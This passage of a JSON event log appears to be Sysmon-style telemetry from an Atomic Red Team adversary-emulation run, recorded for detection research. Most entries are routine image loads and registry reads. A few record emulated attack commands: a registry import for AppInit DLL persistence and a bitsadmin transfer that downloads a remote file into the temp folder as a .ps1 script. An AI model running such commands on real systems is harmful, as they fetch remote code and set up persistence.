"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "subtype": "terminate", - "timestamp": 131883570871990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "file", - "file_name": "REGASM.EXE-8A092F8F.pf", - "file_path": "C:\\Windows\\Prefetch\\REGASM.EXE-8A092F8F.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570872770000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "CSC.EXE-F7BE4369.pf", - "file_path": "C:\\Windows\\Prefetch\\CSC.EXE-F7BE4369.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570872770000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "REGSVCS.EXE-ED64D53D.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVCS.EXE-ED64D53D.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570872770000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg.exe import T1103.reg\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6964, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570874900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "command_line": "reg.exe import T1103.reg", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1784, - "ppid": 6964, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570874990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}", - "unique_ppid": "{42FC7E13-CADF-5C05-0000-00109C984D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "process", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "process", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 8152, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570875160000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "process", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %%TEMP%%\\bitsadmin_flag.ps1\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2108, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570876240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "command_line": "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Users\\bob\\AppData\\Local\\Temp\\bitsadmin_flag.ps1", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5868, - "ppid": 2108, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "subtype": "create", - "timestamp": 131883570876330000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}", - "unique_ppid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "bitsadmin.exe", - "image_path": "C:\\Windows\\System32\\bitsadmin.exe", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 